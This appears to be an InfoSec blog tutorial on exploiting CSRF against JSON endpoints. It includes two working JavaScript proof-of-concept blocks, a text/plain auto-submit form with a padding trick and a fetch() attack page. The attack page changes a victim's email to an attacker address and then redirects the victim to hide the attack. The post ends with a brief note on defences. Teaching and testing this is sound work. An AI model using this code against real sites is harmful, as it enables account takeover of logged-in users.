
Exploiting CSRF on JSON Endpoint without Flash


Before we begin with JSON CSRF, we need to nail down the fundamentals of traditional CSRF and of JSON-based CSRF.

What is CSRF?

CSRF (Cross-Site Request Forgery) is a vulnerability that lets an attacker force a logged-in user's browser to perform unintended actions on a web application. Depending on the affected module, an attacker can use it to change the email address or password of the user's account.

CSRF on JSON Endpoints:

When you try CSRF against a JSON endpoint, the server usually rejects the request. A traditional CSRF exploit built from an HTML form sends a form-encoded body, so the JSON arrives with extra padding (the "=" the browser inserts between field name and value, plus the form's own encoding) and with the wrong Content-Type. Many servers also check for the Content-Type: application/json header, which makes exploitation hard because an HTML form cannot set that header (forms only offer application/x-www-form-urlencoded, multipart/form-data and text/plain). For JSON CSRF to work, the following conditions must be met:

  • The user is logged in.
  • Authentication is cookie based only.
  • No authentication token is sent in a request header (a bearer token or custom header is something the attacker's page cannot supply cross-origin).
  • The same-origin policy must not block the request: for the Fetch API technique this means the target's CORS policy allows the attacker's origin with credentials, because a cross-origin POST with Content-Type: application/json is preflighted by the browser.
  • If the application accepts any content type, it is easily exploitable with HTML forms.
  • If the application only accepts application/json, it is exploitable with the Fetch API (subject to the CORS condition above).

When trying CSRF on such endpoints with an HTML form we often run into padding issues: the form encoding adds "name=value" separators and a trailing newline to the body, which breaks JSON parsing. That is why we are going to use the Fetch API in JavaScript instead.

CSRF Fails due to padding in HTML form for JSON request
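The padding problem described above, and the classic enctype="text/plain" workaround for the case where the server does not insist on Content-Type: application/json, as an added example (this is not code from the original post or from the author's GitHub PoC). The target URL, the payload and the throw-away "pad" key are constructed placeholders.

```javascript
// Added example, not code from the original post: why a plain HTML-form CSRF
// breaks a JSON endpoint, and the enctype="text/plain" trick that fixes it
// when the server accepts any content type. URL and field names are constructed.

// Model of how the browser serialises <form enctype="text/plain">:
// one "name=value" pair per field, each terminated by CRLF (HTML spec).
function encodeTextPlain(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join('');
}

// A lenient server-side parse: JSON.parse tolerates the trailing CRLF as
// whitespace but rejects a stray "=" outside a string, which is the padding problem.
function tryParseJson(body) {
  try { return JSON.parse(body); } catch (_) { return null; }
}

// Naive attempt: the whole JSON document as the field name, empty value.
// The body becomes  {"email":"..."}=\r\n  and the server rejects it.
function naiveFormFields(payload) {
  return [[JSON.stringify(payload), '']];
}

// Working attempt: append a throw-away key whose string value absorbs the "="
// that the browser inserts. Split the JSON just inside that value:
//   name  = {"email":"...","pad":"      value = "}
// so the browser sends  {"email":"...","pad":"="}\r\n  which is valid JSON.
// Assumes padKey is not already a key in payload.
function paddedFormFields(payload, padKey = 'pad') {
  const json = JSON.stringify({ ...payload, [padKey]: '' });
  const cut = json.lastIndexOf('""') + 1;   // index of the closing quote of ""
  return [[json.slice(0, cut), json.slice(cut)]];
}

// Minimal escaping for HTML attribute values.
function escapeAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');
}

// Auto-submitting PoC page for the "accepts any content type" case.
function buildAutoSubmitForm(action, fields) {
  const inputs = fields
    .map(([n, v]) => `<input type="hidden" name="${escapeAttr(n)}" value="${escapeAttr(v)}">`)
    .join('\n    ');
  return `<form id="csrf" action="${escapeAttr(action)}" method="POST" enctype="text/plain">
    ${inputs}
  </form>
  <script>document.getElementById('csrf').submit();</script>`;
}

// Usage: write the returned HTML to the attacker page.
// buildAutoSubmitForm('https://target.example/api/account/email',
//                     paddedFormFields({ email: 'attacker@example.com' }));
```

The form is still sent as text/plain, so a server that rejects anything but application/json will refuse it; that is the case the Fetch API handles.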

We are going to use our JSON CSRF PoC code from GitHub and replace the URL and the JSON body.

JSON CSRF Exploit Code

You can find this exploit code on the GitHub page.

Using the above code, edit the URL and replace the body with the JSON data to perform the CSRF.


After the CSRF request has been sent, we redirect the user to another page so that the attack is not noticed.

CSRF Exploited and User Redirected
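The attacker-page logic for the "server insists on application/json" case, as an added example written for this page (it is not the author's GitHub PoC). TARGET_URL, PAYLOAD and REDIRECT_URL are placeholders to replace with the real endpoint, body and landing page; fetchImpl and navigate are injectable only so the logic can be exercised outside a browser.

```javascript
// Added example, not the author's GitHub PoC: fetch()-based JSON CSRF.
// TARGET_URL, PAYLOAD and REDIRECT_URL are constructed placeholders.
const TARGET_URL = 'https://target.example/api/account/email';
const PAYLOAD = { email: 'attacker@example.com' };
const REDIRECT_URL = 'https://target.example/';

// CORS "simple request" rule (method and Content-Type part; custom headers also
// disqualify). Anything else makes the browser send an OPTIONS preflight first.
const SAFELISTED_METHODS = ['GET', 'HEAD', 'POST'];
const SAFELISTED_TYPES = ['application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain'];
function isPreflighted(init) {
  const method = (init.method || 'GET').toUpperCase();
  if (!SAFELISTED_METHODS.includes(method)) return true;
  const headers = init.headers || {};
  const ct = Object.keys(headers).find((k) => k.toLowerCase() === 'content-type');
  if (!ct) return false;
  const mime = headers[ct].split(';')[0].trim().toLowerCase();
  return !SAFELISTED_TYPES.includes(mime);
}

// The request the PoC sends. credentials:'include' attaches the victim's cookies.
// application/json is not safelisted, so this is preflighted: the POST is only
// delivered if the target answers the OPTIONS with
//   Access-Control-Allow-Origin: <attacker origin>  and
//   Access-Control-Allow-Credentials: true
// (a wildcard "*" is not accepted together with credentials). mode:'no-cors'
// would skip the preflight, but the browser then drops the JSON Content-Type,
// so it does not help against a server that checks that header.
function buildJsonCsrfRequest(url, payload) {
  return {
    url,
    init: {
      method: 'POST',
      mode: 'cors',
      credentials: 'include',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload),
    },
  };
}

// Fire the request, then move the victim on so the attack page is not noticed.
async function runJsonCsrf(url, payload, redirectTo,
                           fetchImpl = globalThis.fetch,
                           navigate = (u) => { globalThis.location.href = u; }) {
  const req = buildJsonCsrfRequest(url, payload);
  let result;
  try {
    const res = await fetchImpl(req.url, req.init);
    result = { sent: true, status: res.status };
  } catch (err) {
    // fetch rejects with a TypeError on any CORS failure. If the preflight was
    // refused the POST was never sent; if the preflight passed but the POST's
    // response lacked CORS headers, the POST did reach the server (the state
    // change happened) even though this page cannot read the reply.
    result = { sent: null, status: null, error: String(err) };
  }
  navigate(redirectTo);
  return result;
}

// In a browser (the attacker page), fire on load; no-op when loaded under Node.
if (typeof document !== 'undefined') {
  runJsonCsrf(TARGET_URL, PAYLOAD, REDIRECT_URL);
}
```

When testing, watch the browser's network tab for the OPTIONS request: if the target's preflight response does not reflect your origin with Access-Control-Allow-Credentials: true, the POST never leaves the browser and the endpoint is not exploitable this way even though it lacks an anti-CSRF token.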


This CSRF was exploitable because the endpoint had no anti-CSRF token and relied on cookie-based authentication alone; switching to token-based authentication (a token sent in a request header rather than a cookie) would also have fixed the issue. Note that checking Content-Type: application/json on its own is not a defence: it only holds as long as the CORS policy does not allow credentialed requests from arbitrary origins.

Thanks for reading! Do follow @rootsploit for more InfoSec write-ups.



  1. skofos, August 1, 2020

    Nice mate, I love this article.

